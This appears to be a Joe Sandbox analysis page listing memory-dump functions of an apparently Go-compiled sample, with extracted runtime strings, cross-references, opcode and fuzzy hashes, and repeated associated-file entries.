Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: ($bad sweepgen in refillspan has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p s$out of memory is nil, not value method bad map state span.base()=bad flushGen , not pointer != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=$refill of span with free space remaining/cpu/classes/scavenge/assist:cpu-secondsruntime.SetFinalizer: first argument is failed to acquire lock to reset capacitymarkWorkerStop: unknown mark worker modecannot free workbufs when work.full != 0runtime: out of memo$span has no free space/gc/scan/globals:bytes/gc/heap/frees:objectsruntime: work.nwait = runtime:scanstack: gp=scanstack - bad statusheadTailIndex overflowruntime.main not on m0set_crosscall2 missingbad g->status in readywirep: invalid p stateassembly checks fa
API String ID: 0-4022714126
Opcode ID: 9dabd832c6ba76a70a48c90e58a7dfff63b997ed51d953f9e6f0480365eae5b0
Instruction ID: c46cd28929a4b7be1b92c8f33aaa8f884a3742278a5f276a59f1b627a1b812e5
Opcode Fuzzy Hash: 9dabd832c6ba76a70a48c90e58a7dfff63b997ed51d953f9e6f0480365eae5b0
Instruction Fuzzy Hash: 58615BB05093048FC354EF69D090A6ABBF1FF88304F41896EF9998B356E774DA44DB52

Function 00AF94B0 Relevance: 5.4, Strings: 4, Instructions: 364COMMON

Download Yara Rule

Strings

!= sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase, xrefs: 00AF9A51
flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan, xrefs: 00AF9A27
runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64, xrefs: 00AF99FE
p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeup, xrefs: 00AF9A85

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: != sweepgen MB globals, work.nproc= work.nwait= nStackRoots= flushedWork double unlock s.spanclass= MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase$ flushGen MB goal, s.state = s.base()= heapGoal=GOMEMLIMIT KiB now, pages at sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nan$p mcache not flushed markroot jobs donepacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeup$runtime: p ms clock, nBSSRoots=runtime: P exp.) for minTrigger=GOMEMLIMIT=bad m value, elemsize= freeindex= span.list=, npages = tracealloc( p->status= in status idleprocs= gcwaiting= schedtick= timerslen= mallocing=bad timedivfloat64nan1float64nan2float64
API String ID: 0-3407218033
Opcode ID: c8a1d9ff61a9018566e19d921f57f734521d583d9dd6b6c9a3ba6bfffe065ee7
Instruction ID: 375e6ab0f820ef8cb52ca802da2654d2a9227d1da341536de7b07f6eb8f4018e
Opcode Fuzzy Hash: c8a1d9ff61a9018566e19d921f57f734521d583d9dd6b6c9a3ba6bfffe065ee7
Instruction Fuzzy Hash: 57021EB46083448FC310EFA8D190B6ABBE0FB89314F10896DF59987366E775D888DF52

Function 00B203B0 Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

", xrefs: 00B20746
forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/ou, xrefs: 00B20727
forEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memory, xrefs: 00B20711
forEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not match monthAWS_S3_US_EAST_1_REGIO, xrefs: 00B2073D

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: "$forEachP: P did not run fnwakep: negative nmspinningstartlockedm: locked to meentersyscall inconsistent inittask with no functionscorrupted semaphore ticketout of memory (stackalloc)shrinking stack in libcallruntime: pcHeader: magic= traceRegion: out of memory$forEachP: not done in async preemptbad manualFreeListruntime: textAddr cleantimers: bad p frames elided..., locked to threadruntime.semacreateruntime.semawakeupsegmentation faultoperation canceledno child processesRFS specific erroridentifier removedinput/ou$forEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timertoo many references: cannot spliceSetFileCompletionNotificationModes: day-of-year does not match monthAWS_S3_US_EAST_1_REGIO
API String ID: 0-2282570572
Opcode ID: a1dda102bd9d086bf6cc0fe4a8d5c0e556fdfae9cf0725689078a372f6643bbf
Instruction ID: 546da60f95aa124bd0f4efe907a1c3dc0e2df28690a7dcedc9fa5c18bafcac0c
Opcode Fuzzy Hash: a1dda102bd9d086bf6cc0fe4a8d5c0e556fdfae9cf0725689078a372f6643bbf
Instruction Fuzzy Hash: 44B100B46193518FC318EF24E0D0A6ABBF1FB88314F5089ADE9898B356D771E845CF42

Function 00B15A50 Relevance: 5.2, Strings: 4, Instructions: 247COMMON

Download Yara Rule

Strings

runtime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement error, xrefs: 00B15C96
runtime: netpoll failedRtlGetNtVersionNumbers, xrefs: 00B15CDA
) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St, xrefs: 00B15CBF
4, xrefs: 00B15C9F

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: ) - NaN P m= MPC= < end > and]:???pc= GSunMonTueWedThuFriSatJanFebMarAprMayJunJulAugSepOctNovDecUTCEET+00+01CATWATEATGMTHSTHDT-03-04-05ESTCSTCDTMSTMDT-02EDTASTADTPSTPDTNSTNDT+06+03+04+07IST+09+08IDT+12PKT+11KST+05JST+10-01-11-12-08-09+13CETBSTMSK-06+14St$4$runtime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stateConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWerrors: *target must be interface or implement error$runtime: netpoll failedRtlGetNtVersionNumbers
API String ID: 0-2053525356
Opcode ID: 811f06c3d61eaa8ea161acea25c802780de73783a806e0ba6f75e5107c3e8281
Instruction ID: 6cd9773748d20c6f3b8903a9e4648b540e648beb15a1bb8ae271729d631c2257
Opcode Fuzzy Hash: 811f06c3d61eaa8ea161acea25c802780de73783a806e0ba6f75e5107c3e8281
Instruction Fuzzy Hash: 46A15AB0509745CFC324DF24C480B9BBBE1FBC8748F94896DE99987381D735A989CB92

Function 00AEB6D0 Relevance: 5.2, Strings: 4, Instructions: 182COMMON

Download Yara Rule

Strings

runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unf, xrefs: 00AEB90F
runtime: unable to acquire - semaphore out of syncmallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largetls: recei, xrefs: 00AEB8F9
1, xrefs: 00AEB918
notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/tot, xrefs: 00AEB783

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: 1$notetsleep - waitm out of syncfailed to get system page sizeassignment to entry in nil mapruntime: found in object at *( in prepareForSweep; sweepgen /cpu/classes/total:cpu-seconds/gc/cycles/automatic:gc-cycles/sched/pauses/total/gc:seconds/sync/mutex/wait/tot$runtime: unable to acquire - semaphore out of syncmallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largetls: recei$runtime: unexpected waitm - semaphore out of syncs.allocCount != s.nelems && freeIndex == s.nelemsdelayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unf
API String ID: 0-3230782881
Opcode ID: 2910a63100c372acf08583fe1149e3d5b549a31e6a9a1f531309e19e80bf2227
Instruction ID: f8c7a933d92273d26af2f5ecf3ae9cd51bef2a5f80e0216018344bf44b1e7337
Opcode Fuzzy Hash: 2910a63100c372acf08583fe1149e3d5b549a31e6a9a1f531309e19e80bf2227
Instruction Fuzzy Hash: 62717E746093518FC315DF29C184B2BBBE1AF88718F09896CE8D48B392D771E845DBA3

Function 00B35200 Relevance: 5.2, Strings: 4, Instructions: 159COMMON

Download Yara Rule

Strings

-, xrefs: 00B35226
-, xrefs: 00B35393
-, xrefs: 00B35371
-, xrefs: 00B3534C

Memory Dump Source

Source File: 00000000.00000002.1922670879.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000000.00000002.1922658209.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000000F22000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.0000000001499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014D6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014F4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1922922381.00000000014FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923469307.00000000016F7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923484342.00000000016F9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923498205.00000000016FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923511349.00000000016FB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923524456.00000000016FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923537015.00000000016FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923557216.0000000001728000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923570703.000000000172A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923583104.000000000172B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923596278.0000000001733000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001734000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000173F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.0000000001777000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923609427.000000000177C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001788000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923670201.0000000001839000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923838663.0000000001A47000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1923852568.0000000001A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ae0000_5EvHHcMjRg.jbxd

Similarity

API ID:
String ID: -$-$-$-
API String ID: 0-1033403326
Opcode ID: fc23c1717d93aae99598bae2d9614697641a7034874cba85c5730291e0d4c8a3
Instruction ID: 9a6136d0ad342a06dc02e06dc021a808b1f27a3332c0ee8f4abb821f4ba6c1d8
Opcode Fuzzy Hash: fc23c1717d93aae99598bae2d9614697641a7034874cba85c5730291e0d4c8a3
Instruction Fuzzy Hash: DA5102B26497164FD725CE28D89031EBBC1AB90308F58467CD8958B3D2E3B98A0D87C6

